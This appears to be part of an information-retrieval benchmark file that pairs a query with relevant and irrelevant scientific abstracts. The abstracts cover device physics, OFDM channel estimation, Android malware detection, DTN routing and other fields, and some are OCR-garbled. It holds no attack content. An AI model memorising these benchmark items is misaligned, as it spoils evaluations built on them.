"text": "In advanced CMOS technologies, the negative bias temperature instability (NBTI) phenomenon in pMOSFETs is a major reliability concern as well as a limiting factor in future device scaling. Recently, much effort has been expended to further the basic understanding of this mechanism. This tutorial gives an overview of the physics of NBTI. Discussions include such topics as the impact of NBTI on the observed changes in the device characteristics as well as the impact of gate oxide processes on the physics of NBTI. Current experimental results, exploring various NBTI effects such as frequency dependence and relaxation, are also discussed. Since some of the recent work on the various NBTI effects seems contradictory, focus is placed on highlighting our current understanding, our open questions and our future challenges.",
"title": ""
},
{
"docid": "6bdfb1bb4afb4a7581ad26dd1f1e1089",
"text": "Currently, fuzzy controllers are the most popular choice for hardware implementation of complex control surfaces because they are easy to design. Neural controllers are more complex and hard to train, but provide an outstanding control surface with much less error than that of a fuzzy controller. There are also some problems that have to be solved before the networks can be implemented on VLSI chips. First, an approximation function needs to be developed because CMOS neural networks have an activation function different than any function used in neural network software. Next, this function has to be used to train the network. Finally, the last problem for VLSI designers is the quantization effect caused by discrete values of the channel length (L) and width (W) of MOS transistor geometries. Two neural networks were designed in 1.5 microm technology. Using adequate approximation functions solved the problem of activation function. With this approach, trained networks were characterized by very small errors. Unfortunately, when the weights were quantized, errors were increased by an order of magnitude. However, even though the errors were enlarged, the results obtained from neural network hardware implementations were superior to the results obtained with fuzzy system approach.",
"title": ""
},
{
"docid": "1b4d292a618befaa44cd8214abe46038",
"text": "The obsessive-compulsive spectrum is an important concept referring to a number of disorders drawn from several diagnostic categories that share core obsessive-compulsive features. These disorders can be grouped by the focus of their symptoms: bodily preoccupation, impulse control, or neurological disorders. Although the disorders are clearly distinct from one another, they have intriguing similarities in phenomenology, etiology, pathophysiology, patient characteristics, and treatment response. In combination with the knowledge gained through many years of research on obsessive-compulsive disorder (OCD), the concept of a spectrum has generated much fruitful research on the spectrum disorders. It has become apparent that these disorders can also be viewed as being on a continuum of compulsivity to impulsivity, characterized by harm avoidance at the compulsive end and risk seeking at the impulsive end. The compulsive and impulsive disorders differ in systematic ways that are just beginning to be understood. Here, we review these concepts and several representative obsessive-compulsive spectrum disorders including both compulsive and impulsive disorders, as well as the three different symptom clusters: OCD, body dysmorphic disorder, pathological gambling, sexual compulsivity, and autism spectrum disorders.",
"title": ""
},
{
"docid": "672fa729e41d20bdd396f9de4ead36b3",
"text": "Data that encompasses relationships is represented by a graph of interconnected nodes. Social network analysis is the study of such graphs which examines questions related to structures and patterns that can lead to the understanding of the data and predicting the trends of social networks. Static analysis, where the time of interaction is not considered (i.e., the network is frozen in time), misses the opportunity to capture the evolutionary patterns in dynamic networks. Specifically, detecting the community evolutions, the community structures that changes in time, provides insight into the underlying behaviour of the network. Recently, a number of researchers have started focusing on identifying critical events that characterize the evolution of communities in dynamic scenarios. In this paper, we present a framework for modeling and detecting community evolution in social networks, where a series of significant events is defined for each community. A community matching algorithm is also proposed to efficiently identify and track similar communities over time. We also define the concept of meta community which is a series of similar communities captured in different timeframes and detected by our matching algorithm. We illustrate the capabilities and potential of our framework by applying it to two real datasets. Furthermore, the events detected by the framework is supplemented by extraction and investigation of the topics discovered for each community. c © 2011 Published by Elsevier Ltd.",
"title": ""
},
{
"docid": "c0a5ef8b48a78f5ce3cfdb6497fcba41",
"text": "Silicon photonics is a new technology that should at least enable electronics and optics to be integrated on the same optoelectronic circuit chip, leading to the production of low-cost devices on silicon wafers by using standard processes from the microelectronics industry. In order to achieve real-low-cost devices, some challenges need to be taken up concerning the integration technological process of optics with electronics and the packaging of the chip. In this paper, we review recent progress in the packaging of silicon photonic circuits from on-CMOS wafer-level integration to the single-chip package and input/output interconnects. We focus on optical fiber-coupling structures comparing edge and surface couplers. In the following, we detail optical alignment tolerances for both coupling architecture, discussing advantages and drawbacks from the packaging process point of view. Finally, we describe some achievements involving advanced-packaging techniques.",
"title": ""
},
{
"docid": "b33c7e26d3a0a8fc7fc0fb73b72840d4",
"text": "As the number of Android malicious applications has explosively increased, effectively vetting Android applications (apps) has become an emerging issue. Traditional static analysis is ineffective for vetting apps whose code have been obfuscated or encrypted. Dynamic analysis is suitable to deal with the obfuscation and encryption of codes. However, existing dynamic analysis methods cannot effectively vet the applications, as a limited number of dynamic features have been explored from apps that have become increasingly sophisticated. In this work, we propose an effective dynamic analysis method called DroidWard in the aim to extract most relevant and effective features to characterize malicious behavior and to improve the detection accuracy of malicious apps. In addition to using the existing 9 features, DroidWard extracts 6 novel types of effective features from apps through dynamic analysis. DroidWard runs apps, extracts features and identifies benign and malicious apps with Support Vector Machine (SVM), Decision Tree (DTree) and Random Forest. 666 Android apps are used in the experiments and the evaluation results show that DroidWard correctly classifies 98.54% of malicious apps with 1.55% of false positives. Compared to existing work, DroidWard improves the TPR with 16.07% and suppresses the FPR with 1.31% with SVM, indicating that it is more effective than existing methods.",
"title": ""
},
{
"docid": "ab430a12088341758de5cde60ef26070",
"text": "BACKGROUND\nThe nonselective 5-HT(4) receptor agonists, cisapride and tegaserod have been associated with cardiovascular adverse events (AEs).\n\n\nAIM\nTo perform a systematic review of the safety profile, particularly cardiovascular, of 5-HT(4) agonists developed for gastrointestinal disorders, and a nonsystematic summary of their pharmacology and clinical efficacy.\n\n\nMETHODS\nArticles reporting data on cisapride, clebopride, prucalopride, mosapride, renzapride, tegaserod, TD-5108 (velusetrag) and ATI-7505 (naronapride) were identified through a systematic search of the Cochrane Library, Medline, Embase and Toxfile. Abstracts from UEGW 2006-2008 and DDW 2008-2010 were searched for these drug names, and pharmaceutical companies approached to provide unpublished data.\n\n\nRESULTS\nRetrieved articles on pharmacokinetics, human pharmacodynamics and clinical data with these 5-HT(4) agonists, are reviewed and summarised nonsystematically. Articles relating to cardiac safety and tolerability of these agents, including any relevant case reports, are reported systematically. Two nonselective 5-HT(4) agonists had reports of cardiovascular AEs: cisapride (QT prolongation) and tegaserod (ischaemia). Interactions with, respectively, the hERG cardiac potassium channel and 5-HT(1) receptor subtypes have been suggested to account for these effects. No cardiovascular safety concerns were reported for the newer, selective 5-HT(4) agonists prucalopride, velusetrag, naronapride, or for nonselective 5-HT(4) agonists with no hERG or 5-HT(1) affinity (renzapride, clebopride, mosapride).\n\n\nCONCLUSIONS\n5-HT(4) agonists for GI disorders differ in chemical structure and selectivity for 5-HT(4) receptors. Selectivity for 5-HT(4) over non-5-HT(4) receptors may influence the agent's safety and overall risk-benefit profile. Based on available evidence, highly selective 5-HT(4) agonists may offer improved safety to treat patients with impaired GI motility.",
"title": ""
},
{
"docid": "b4166b57419680e348d7a8f27fbc338a",
"text": "OBJECTIVES\nTreatments of female sexual dysfunction have been largely unsuccessful because they do not address the psychological factors that underlie female sexuality. Negative self-evaluative processes interfere with the ability to attend and register physiological changes (interoceptive awareness). This study explores the effect of mindfulness meditation training on interoceptive awareness and the three categories of known barriers to healthy sexual functioning: attention, self-judgment, and clinical symptoms.\n\n\nMETHODS\nForty-four college students (30 women) participated in either a 12-week course containing a \"meditation laboratory\" or an active control course with similar content or laboratory format. Interoceptive awareness was measured by reaction time in rating physiological response to sexual stimuli. Psychological barriers were assessed with self-reported measures of mindfulness and psychological well-being.\n\n\nRESULTS\nWomen who participated in the meditation training became significantly faster at registering their physiological responses (interoceptive awareness) to sexual stimuli compared with active controls (F(1,28) = 5.45, p = .03, η(p)(2) = 0.15). Female meditators also improved their scores on attention (t = 4.42, df = 11, p = .001), self-judgment, (t = 3.1, df = 11, p = .01), and symptoms of anxiety (t = -3.17, df = 11, p = .009) and depression (t = -2.13, df = 11, p < .05). Improvements in interoceptive awareness were correlated with improvements in the psychological barriers to healthy sexual functioning (r = -0.44 for attention, r = -0.42 for self-judgment, and r = 0.49 for anxiety; all p < .05).\n\n\nCONCLUSIONS\nMindfulness-based improvements in interoceptive awareness highlight the potential of mindfulness training as a treatment of female sexual dysfunction.",
"title": ""
},
{
"docid": "8ae986abd5f31a06d04a2762ee3bcb91",
"text": "Theta and gamma frequency oscillations occur in the same brain regions and interact with each other, a process called cross-frequency coupling. Here, we review evidence for the following hypothesis: that the dual oscillations form a code for representing multiple items in an ordered way. This form of coding has been most clearly demonstrated in the hippocampus, where different spatial information is represented in different gamma subcycles of a theta cycle. Other experiments have tested the functional importance of oscillations and their coupling. These involve correlation of oscillatory properties with memory states, correlation with memory performance, and effects of disrupting oscillations on memory. Recent work suggests that this coding scheme coordinates communication between brain regions and is involved in sensory as well as memory processes.",
"title": ""
},
{
"docid": "47b34b24dbe089ddff5f7dccce9f358a",
"text": "The use of multi-amplitude signaling schemes in wireless OFDM systems requires the tracking of the fading radio channel. This paper addresses channel estimation based on time-domain channel statistics. Using a general model for a slowly fading channel, we present the MMSE and LS estimators and a method for modifications compromising between complexity and performance. The symbol error rate for a 16-QAM system is presented by means of simulation results. Depending upon estimator complexity, up to 4 dB in SNR can be gained over the LS estimator. I . INTRODUCTION Currently, orthogonal frequency-division multiplexing (OFDM) systems [l] are subject t o significant investigation. Since this technique has been adopted in the European digital audio broadcasting (DAB) system 121, OFDM signaling in fading channel environments has gained a broad interest. For instance, its applicability to digital TV broadcasting is currently being investigated [3]. The use of differential phase-shzji! keying (DPSK) in OFDM systems avoids the tracking of a time varying channel. However, this will limit the number of bits per symbol and results in a 3 dB loss in signal-to-noise ratio (SNR) [4]. If the receiver contains a channel estimator, multiamplitude signaling schemes can be used. In [5] and [6], 16-QAM modulation in an OFDM system has been investigated. A decision-directed channeltracking method, which allows the use of multi-amplitude schemes in a slow Rayleigh-fading environment is analysed in [ 5 ] . In the design of wireless OFDM systems, the channel is usually assumed to have a finite-length impulse response. A cyclic extension, longer than this impulse response, is put between consecutive blocks in order to avoid interblock interference and preserve orthogonality of the tones [7 ] . Generally, the OFDM system is designed so that the cyclic extension is a small percentage of the total symbol length. This paper discusses channel estimation techniques in wireless OFDM systems, that use this property of the channel impulse response. Hoeher [6] and Cioffi [8] have also addressed this property. In Section 11, we describe the system model. Section I11 discusses the minimum mean-square error (MMSE) and least-squares (LS) channel estimators. The MMSE estimator has good performance but high complexity. The LS estimator has low complexity, but its performance is not as good as that of the MMSE estimator. We present modifications to both MMSE and LS estimators that use the assumption of a finite length impulse response. In Section IV we evaluate the estimators by simulating a 16-QAM signaling scheme. The performance is presented both in terms of mean-square error (MSE) and symbol error rate (SER). 11. SYSTEM DESCRIPTION We will consider the system shown in Fig. 1, where zk: are the transmitted symbols, g ( t ) is the channel impulse response, E ( t ) is the white complex Gaussian channel noise and yk are the received symbols. The transmitted symbols x k are taken from a multi-amplitude signal constellation. The D/A and A/D converters contain ideal low-pass filters with bandwidth l/Ts, where T, is the sampling interval. A cyclic extension of time length TG (not shown in Fig. I. for reasons of simplicity) is used to eliminate inter-block interference and preserve the orthogonality of the tones. We treat the channel impulse response g(t) as a timelimited pulse train of the form g( t ) = ams(t TmTs), (1) m where the amplitudes a, are complex valued and 0 5 T,T, 5 TG, i.e., the entire impulse response lies inside Fig. 1: Base-band OFDM system 0-7803-2742-XI95 $4.00",
"title": ""
},
{
"docid": "c77c6ea404d9d834ef1be5a1d7222e66",
"text": "We introduce the concepts of regular and totally regular bipolar fuzzy graphs. We prove necessary and sufficient condition under which regular bipolar fuzzy graph and totally bipolar fuzzy graph are equivalent. We introduce the notion of bipolar fuzzy line graphs and present some of their properties. We state a necessary and sufficient condition for a bipolar fuzzy graph to be isomorphic to its corresponding bipolar fuzzy line graph. We examine when an isomorphism between two bipolar fuzzy graphs follows from an isomorphism of their corresponding bipolar fuzzy line graphs.",
"title": ""
},
{
"docid": "d4cd0dabcf4caa22ad92fab40844c786",
"text": "NA",
"title": ""
},
{
"docid": "e152424ca6785ddf034334f56cee4535",
"text": "I t is clear that the temi social marketing is now a wellestablished part of the marketing vocabulary in universities, govemmetit agencies, private nonprofit organizations, and private for-profit firms. There are now social marketing textbooks (Kotler and Roberto 1989; Manoff 1975), readings books (Fine 1990), chapters within mainstream texts (Kotler and Andreasen 1991) and a Harvard teaching note (Rangun and Karim 1991). There have been reviews ofthe accomplishments of social marketing (Fox and Kotler 1980; Malafarina and Loken 1993) and calls to researchers to become more deeply involved in studies of social marketing to advance the science of marketing (Andreasen 1993). Major international and domestic behavior change programs now routinely have social marketing components (Debus 1987; Ramah 1992; Smith 1989). People with titles like Manager of Social Marketing now can be found in private consulting organizations.",
"title": ""
},
{
"docid": "bca70006889b6d4186b522b9edd4b032",
"text": "Native advertising is a specific form of online advertising where ads replicate the look-and-feel of their serving platform. In such context, providing a good user experience with the served ads is crucial to ensure long-term user engagement. In this work, we explore the notion of ad quality, namely the effectiveness of advertising from a user experience perspective. We design a learning framework to predict the pre-click quality of native ads. More specifically, we look at detecting offensive native ads, showing that, to quantify ad quality, ad offensive user feedback rates are more reliable than the commonly used click-through rate metrics. We then conduct a crowd-sourcing study to identify which criteria drive user preferences in native advertising. We translate these criteria into a set of ad quality features that we extract from the ad text, image and advertiser, and then use them to train a model able to identify offensive ads. We show that our model is very effective in detecting offensive ads, and provide in-depth insights on how different features affect ad quality. Finally, we deploy a preliminary version of such model and show its effectiveness in the reduction of the offensive ad feedback rate.",
"title": ""
},
{
"docid": "0b3ed0ce26999cb6188fb0c88eb483ab",
"text": "We consider the problem of learning causal networks with int erventions, when each intervention is limited in size under Pearl’s Structural Equation Model with independent e rrors (SEM-IE). The objective is to minimize the number of experiments to discover the causal directions of all the e dges in a causal graph. Previous work has focused on the use of separating systems for complete graphs for this task. We prove that any deterministic adaptive algorithm needs to be a separating system in order to learn complete graphs in t e worst case. In addition, we present a novel separating system construction, whose size is close to optimal and is ar guably simpler than previous work in combinatorics. We also develop a novel information theoretic lower bound on th e number of interventions that applies in full generality, including for randomized adaptive learning algorithms. For general chordal graphs, we derive worst case lower bound s o the number of interventions. Building on observations about induced trees, we give a new determinist ic adaptive algorithm to learn directions on any chordal skeleton completely. In the worst case, our achievable sche me is anα-approximation algorithm where α is the independence number of the graph. We also show that there exi st graph classes for which the sufficient number of experiments is close to the lower bound. In the other extreme , there are graph classes for which the required number of experiments is multiplicativelyα away from our lower bound. In simulations, our algorithm almost always performs very c lose to the lower bound, while the approach based on separating systems for complete graphs is significantly wor se for random chordal graphs.",
"title": ""
},
{
"docid": "ef779863c1ca2e8eab8198b5a8ebb503",
"text": "Due to the ongoing debate regarding the definitions and measurement of cyberbullying, the present article critically appraises the existing literature and offers direction regarding the question of how best to conceptualise peer-to-peer abuse in a cyber context. Variations across definitions are problematic as it has been argued that inconsistencies with regard to definitions result in researchers examining different phenomena, whilst the absence of an agreed conceptualisation of the behaviour(s) involved hinders the development of reliable and valid measures. Existing definitions of cyberbullying often incorporate the criteria of traditional bullying such as intent to harm, repetition, and imbalance of power. However, due to the unique nature of cyber-based communication, it can be difficult to identify such criteria in relation to cyber-based abuse. Thus, for these reasons cyberbullying may not be the most appropriate term. Rather than attempting to “shoe-horn” this abusive behaviour into the preconceived conceptual framework that provides an understanding of traditional bullying, it is timely to take an alternative approach. We argue that it is now time to turn our attention to the broader issue of cyber aggression, rather than persist with the narrow focus that is cyberbullying.",
"title": ""
}
] | scidocsrr |
d87c0a24f541c17541c1fda529657c5c | Causal embeddings for recommendation | [
{
"docid": "6b88e1cc20825b2df971f5cddff0d72f",
"text": "When a new treatment is considered for use, whether a pharmaceutical drug or a search engine ranking algorithm, a typical question that arises is, will its performance exceed that of the current treatment? The conventional way to answer this counterfactual question is to estimate the effect of the new treatment in comparison to that of the conventional treatment by running a controlled, randomized experiment. While this approach theoretically ensures an unbiased estimator, it suffers from several drawbacks, including the difficulty in finding representative experimental populations as well as the cost of running randomized trials. Moreover, such trials neglect the huge quantities of available controlcondition data, which in principle can be utilized for the harder task of predicting individualized effects. In this paper we propose a discriminative framework for predicting the outcomes of a new treatment from a large dataset of the control condition and data from a small (and possibly unrepresentative) randomized trial comparing new and old treatments. Our learning objective, which requires minimal assumptions on the treatments, models the relation between the outcomes of the different conditions. This allows us to not only estimate mean effects but also to generate individual predictions for examples outside the small randomized sample. We demonstrate the utility of our approach through experiments in three areas: search engine operation, treatments to diabetes patients, and market value estimation of houses. Our results demonstrate that our approach can reduce the number and size of the currently performed randomized controlled experiments, thus saving significant time, money and effort on the part of practitioners.",
"title": ""
}
] | [
{
"docid": "fb6ed16b64cb3246e6670fd718bda819",
"text": "There are various premier software packages available in the market, either for free use or found at a high price, to analyse the century old electrical power system. Universities in the developed countries expend thousands of dollars per year to bring these commercial applications to the desktops of students, teachers and researchers. For teachers and researchers this is regarded as a good long-term investment. As well, for the postgraduate students these packages are very important to validate the model developed during course of study. For simulating different test cases and/or standard systems, which are readily available with these widely used commercial software packages, such enriched software plays an important role. But in case of underdeveloped and developing countries the high amount of money needed to be expended per year to purchase commercial software is a farfetched idea. In addition, undergraduate students who are learning power system for the very first time find these packages incongruous for them since they are not familiar with the detailed input required to run the program. Even if it is a simple load flow program to find the steady-state behaviour of the system, or an elementary symmetrical fault analysis test case these packages require numerous inputs since they mimic a practical power system rather than considering simple test cases. In effect, undergraduate students tend to stay away from these packages. So rather than aiding the study in power system, these create a bad impression on students‘ mind about the very much interesting course.",
"title": ""
},
{
"docid": "03371f6200ebf2bdf0807e41a998550c",
"text": "As next-generation sequencing projects generate massive genome-wide sequence variation data, bioinformatics tools are being developed to provide computational predictions on the functional effects of sequence variations and narrow down the search of casual variants for disease phenotypes. Different classes of sequence variations at the nucleotide level are involved in human diseases, including substitutions, insertions, deletions, frameshifts, and non-sense mutations. Frameshifts and non-sense mutations are likely to cause a negative effect on protein function. Existing prediction tools primarily focus on studying the deleterious effects of single amino acid substitutions through examining amino acid conservation at the position of interest among related sequences, an approach that is not directly applicable to insertions or deletions. Here, we introduce a versatile alignment-based score as a new metric to predict the damaging effects of variations not limited to single amino acid substitutions but also in-frame insertions, deletions, and multiple amino acid substitutions. This alignment-based score measures the change in sequence similarity of a query sequence to a protein sequence homolog before and after the introduction of an amino acid variation to the query sequence. Our results showed that the scoring scheme performs well in separating disease-associated variants (n = 21,662) from common polymorphisms (n = 37,022) for UniProt human protein variations, and also in separating deleterious variants (n = 15,179) from neutral variants (n = 17,891) for UniProt non-human protein variations. In our approach, the area under the receiver operating characteristic curve (AUC) for the human and non-human protein variation datasets is ∼0.85. We also observed that the alignment-based score correlates with the deleteriousness of a sequence variation. In summary, we have developed a new algorithm, PROVEAN (Protein Variation Effect Analyzer), which provides a generalized approach to predict the functional effects of protein sequence variations including single or multiple amino acid substitutions, and in-frame insertions and deletions. The PROVEAN tool is available online at http://provean.jcvi.org.",
"title": ""
},
{
"docid": "02a130ee46349366f2df347119831e5c",
"text": "Low power ad hoc wireless networks operate in conditions where channels are subject to fading. Cooperative diversity mitigates fading in these networks by establishing virtual antenna arrays through clustering the nodes. A cluster in a cooperative diversity network is a collection of nodes that cooperatively transmits a single packet. There are two types of clustering schemes: static and dynamic. In static clustering all nodes start and stop transmission simultaneously, and nodes do not join or leave the cluster while the packet is being transmitted. Dynamic clustering allows a node to join an ongoing cooperative transmission of a packet as soon as the packet is received. In this paper we take a broad view of the cooperative network by examining packet flows, while still faithfully implementing the physical layer at the bit level. We evaluate both clustering schemes using simulations on large multi-flow networks. We demonstrate that dynamically-clustered cooperative networks substantially outperform both statically-clustered cooperative networks and classical point-to-point networks.",
"title": ""
},
{
"docid": "8738ec0c6e265f0248d7fa65de4cdd05",
"text": "BACKGROUND\nCaring traditionally has been at the center of nursing. Effectively measuring the process of nurse caring is vital in nursing research. A short, less burdensome dimensional instrument for patients' use is needed for this purpose.\n\n\nOBJECTIVES\nTo derive and validate a shorter Caring Behaviors Inventory (CBI) within the context of the 42-item CBI.\n\n\nMETHODS\nThe responses to the 42-item CBI from 362 hospitalized patients were used to develop a short form using factor analysis. A test-retest reliability study was conducted by administering the shortened CBI to new samples of patients (n = 64) and nurses (n = 42).\n\n\nRESULTS\nFactor analysis yielded a 24-item short form (CBI-24) that (a) covers the four major dimensions assessed by the 42-item CBI, (b) has internal consistency (alpha =.96) and convergent validity (r =.62) similar to the 42-item CBI, (c) reproduces at least 97% of the variance of the 42 items in patients and nurses, (d) provides statistical conclusions similar to the 42-item CBI on scoring for caring behaviors by patients and nurses, (e) has similar sensitivity in detecting between-patient difference in perceptions, (f) obtains good test-retest reliability (r = .88 for patients and r=.82 for nurses), and (g) confirms high internal consistency (alpha >.95) as a stand-alone instrument administered to the new samples.\n\n\nCONCLUSION\nCBI-24 appears to be equivalent to the 42-item CBI in psychometric properties, validity, reliability, and scoring for caring behaviors among patients and nurses. These results recommend the use of CBI-24 to reduce response burden and research costs.",
"title": ""
},
{
"docid": "1ec80e919d847675ce36ca16b7da0c67",
"text": "After more than 12 years of development, the ninth edition of the Present State Examination (PSE-9) was published, together with associated instruments and computer algorithm, in 1974. The system has now been expanded, in the framework of the World Health Organization/Alcohol, Drug Abuse, and Mental Health Administration Joint Project on Standardization of Diagnosis and Classification, and is being tested with the aim of developing a comprehensive procedure for clinical examination that is also capable of generating many of the categories of the International Classification of Diseases, 10th edition, and the Diagnostic and Statistical Manual of Mental Disorders, revised third edition. The new system is known as SCAN (Schedules for Clinical Assessment in Neuropsychiatry). It includes the 10th edition of the PSE as one of its core schedules, preliminary tests of which have suggested that reliability is similar to that of PSE-9. SCAN is being field tested in 20 centers in 11 countries. A final version is expected to be available in January 1990.",
"title": ""
},
{
"docid": "933bc7cc6e1d56969f9d3fc0157f7ac9",
"text": "This paper presents algorithms and techniques for single-sensor tracking and multi-sensor fusion of infrared and radar data. The results show that fusing radar data with infrared data considerably increases detection range, reliability and accuracy of the object tracking. This is mandatory for further development of driver assistance systems. Using multiple model filtering for sensor fusion applications helps to capture the dynamics of maneuvering objects while still achieving smooth object tracking for not maneuvering objects. This is important when safety and comfort systems have to make use of the same sensor information. Comfort systems generally require smoothly filtered data whereas for safety systems it is crucial to capture maneuvers of other road users as fast as possible. Multiple model filtering and probabilistic data association techniques are presented and all presented algorithms are tested in real-time on standard PC systems.",
"title": ""
},
{
"docid": "3204def0de796db05e4fcc2a86743bb6",
"text": "This keynote paper: (1) presents the 21st century vision of computing and identifies various IT paradigms promising to deliver computing as a utility; (2) defines the architecture for creating market-oriented Clouds and computing atmosphere by leveraging technologies such as virtual machines; (3) provides thoughts on market-based resource management strategies that encompass both customer-driven service management and computational risk management to sustain SLA-oriented resource allocation; (4) presents the work carried out as part of our new Cloud Computing initiative, called Cloudbus: (i) Aneka, a Platform as a Service software system containing SDK (Software Development Kit) for construction of Cloud applications and deployment on private or public Clouds, in addition to supporting market-oriented resource management; (ii) internetworking of Clouds for dynamic creation of federated computing environments for scaling of elastic applications; (iii) creation of 3 party Cloud brokering services for building content delivery networks and e-Science applications and their deployment on capabilities of IaaS providers such as Amazon along with Grid mashups; (iv) CloudSim supporting modelling and simulation of Clouds for performance studies; (v) Energy Efficient Resource Allocation Mechanisms and Techniques for creation and management of Green Clouds; and (vi) pathways for future research.",
"title": ""
},
{
"docid": "9a1c82342355d302b2c10c63bd5d4fd6",
"text": "This paper addresses the problem of estimating the 3D shape of a smooth textureless solid from multiple images acquired under orthographic projection from unknown and unconstrained viewpoints. In this setting, the only reliable image features are the object’s silhouettes, and the only true stereo correspondence between pairs of silhouettes are the frontier points where two viewing rays intersect in the tangent plane of the surface. An algorithm for identifying geometrically-consistent frontier points candidates while estimating the cameras’ projection matrices is presented. This algorithm uses the signature representation of the dual of image silhouettes to identify promising correspondences, and it exploits the redundancy of multiple epipolar geometries to retain the consistent ones. The visual hull of the observed solid is finally reconstructed from the recovered viewpoints. The proposed approach has been implemented, and experiments with six real image sequences are presented, including a comparison between ground-truth and recovered camera configurations, and sample visual hulls computed by the algorithm.",
"title": ""
},
{
"docid": "16880162165f4c95d6b01dc4cfc40543",
"text": "In this paper we present CMUcam3, a low-cost, open source, em bedded computer vision platform. The CMUcam3 is the third generation o f the CMUcam system and is designed to provide a flexible and easy to use ope n source development environment along with a more powerful hardware platfo rm. The goal of the system is to provide simple vision capabilities to small emb dded systems in the form of an intelligent sensor that is supported by an open sou rce community. The hardware platform consists of a color CMOS camera, a frame bu ff r, a low cost 32bit ARM7TDMI microcontroller, and an MMC memory card slot. T he CMUcam3 also includes 4 servo ports, enabling one to create entire, w orking robots using the CMUcam3 board as the only requisite robot processor. Cus tom C code can be developed using an optimized GNU toolchain and executabl es can be flashed onto the board using a serial port without external download ing hardware. The development platform includes a virtual camera target allowi ng for rapid application development exclusively on a PC. The software environment c omes with numerous open source example applications and libraries includi ng JPEG compression, frame differencing, color tracking, convolutions, histog ramming, edge detection, servo control, connected component analysis, FAT file syste m upport, and a face detector.",
"title": ""
},
{
"docid": "04716d649c2fb0a3fa61b026bed80046",
"text": "Episodic memory provides a mechanism for accessing past experiences and has been relatively ignored in comp utational models of cognition. In this paper, we present a fr amework for describing the functional stages for computatio nal models of episodic memory: encoding, storage, retrieval an d use of the retrieved memories. We present two implementati ons of a computational model of episodic memory in Soar. We demonstrate all four stages of the model for a simp le interactive task.",
"title": ""
},
{
"docid": "df5394835b04ceb38a17bf1586a3c456",
"text": "Attention-based neural models have achieved great success in natural language inference (NLI). In this paper, we propose the Convolutional Interaction Network (CIN), a general model to capture the interaction between two sentences, which can be an alternative to the attention mechanism for NLI. Specifically, CIN encodes one sentence with the filters dynamically generated based on another sentence. Since the filters may be designed to have various numbers and sizes, CIN can capture more complicated interaction patterns. Experiments on three very large datasets demonstrate CIN’s efficacy.",
"title": ""
},
{
"docid": "2cf7921cce2b3077c59d9e4e2ab13afe",
"text": "Scientists and consumers preference focused on natural colorants due to the emergence of negative health effects of synthetic colorants which is used for many years in foods. Interest in natural colorants is increasing with each passing day as a consequence of their antimicrobial and antioxidant effects. The biggest obstacle in promotion of natural colorants as food pigment agents is that it requires high investment. For this reason, the R&D studies related issues are shifted to processes to reduce cost and it is directed to pigment production from microorganisms with fermentation. Nowadays, there is pigments obtained by commercially microorganisms or plants with fermantation. These pigments can be use for both food colorant and food supplement. In this review, besides colourant and antioxidant properties, antimicrobial properties of natural colorants are discussed.",
"title": ""
},
{
"docid": "52b8e748a87a114f5d629f8dcd9a7dfc",
"text": "Delay-tolerant networks (DTNs) rely on the mobility of nodes and their contacts to make up with the lack of continuous connectivity and, thus, enable message delivery from source to destination in a “store-carry-forward” fashion. Since message delivery consumes resource such as storage and power, some nodes may choose not to forward or carry others' messages while relying on others to deliver their locally generated messages. These kinds of selfish behaviors may hinder effective communications over DTNs. In this paper, we present an efficient incentive-compatible (IC) routing protocol (ICRP) with multiple copies for two-hop DTNs based on the algorithmic game theory. It takes both the encounter probability and transmission cost into consideration to deal with the misbehaviors of selfish nodes. Moreover, we employ the optimal sequential stopping rule and Vickrey-Clarke-Groves (VCG) auction as a strategy to select optimal relay nodes to ensure that nodes that honestly report their encounter probability and transmission cost can maximize their rewards. We attempt to find the optimal stopping time threshold adaptively based on realistic probability model and propose an algorithm to calculate the threshold. Based on this threshold, we propose a new method to select relay nodes for multicopy transmissions. To ensure that the selected relay nodes can receive their rewards securely, we develop a signature scheme based on a bilinear map to prevent the malicious nodes from tampering. Through simulations, we demonstrate that ICRP can effectively stimulate nodes to forward/carry messages and achieve higher packet delivery ratio with lower transmission cost.",
"title": ""
},
{
"docid": "df0ef093e337d76f4902671065ce4fbc",
"text": "Refactoring, the activity of changing source code design without affecting its external behavior, is a widely used practice among developers, since it is considered to positively affect the quality of software systems. However, there are some \"human factors\" to be considered while performing refactoring, including developers knowledge of systems architecture. Recent studies showed how much \"people\" metrics, such as code ownership, might affect software quality as well. In this preliminary study we investigated the relationship between code ownership and refactoring activity performed by developers. This study can provide useful insights on who performs refactoring and help team leaders to properly manage human resources during software development.",
"title": ""
},
{
"docid": "b97922c2a70b2b197866ecf158e93a68",
"text": "Mobile devices can motivate learners through moving language learning from predominantly classroom–based contexts into contexts that are free from time and space. The increasing development of new applications can offer valuable support to the language learning process and can provide a basis for a new self regulated and personal approach to learning. A key challenge for language teachers is to actively explore the potential of mobile technologies in their own learning so that they can support students in using them. The aim of this paper is first to describe the basic theoretical framework of Mobile Learning and Personal Learning Environments. Secondly, it intends to assist language teachers and learners in building their own Mobile Personal Learning Environment providing a useful classification of iPhone applications with a description and examples. The paper concludes with the proposal of ideas for practical, personal language learning scenarios, piloted in an Italian language learning context. DOI: 10.4018/978-1-4666-2467-2.ch017",
"title": ""
},
{
"docid": "c5efe5fe7c945e48f272496e7c92bb9c",
"text": "Knowing when a classifier’s prediction can be trusted is useful in many applications and critical for safely using AI. While the bulk of the effort in machine learning research has been towards improving classifier performance, understanding when a classifier’s predictions should and should not be trusted has received far less attention. The standard approach is to use the classifier’s discriminant or confidence score; however, we show there exists an alternative that is more effective in many situations. We propose a new score, called the trust score, which measures the agreement between the classifier and a modified nearest-neighbor classifier on the testing example. We show empirically that high (low) trust scores produce surprisingly high precision at identifying correctly (incorrectly) classified examples, consistently outperforming the classifier’s confidence score as well as many other baselines. Further, under some mild distributional assumptions, we show that if the trust score for an example is high (low), the classifier will likely agree (disagree) with the Bayes-optimal classifier. Our guarantees consist of non-asymptotic rates of statistical consistency under various nonparametric settings and build on recent developments in topological data analysis.",
"title": ""
},
{
"docid": "30da5996ad883e41df979fe3640e35ed",
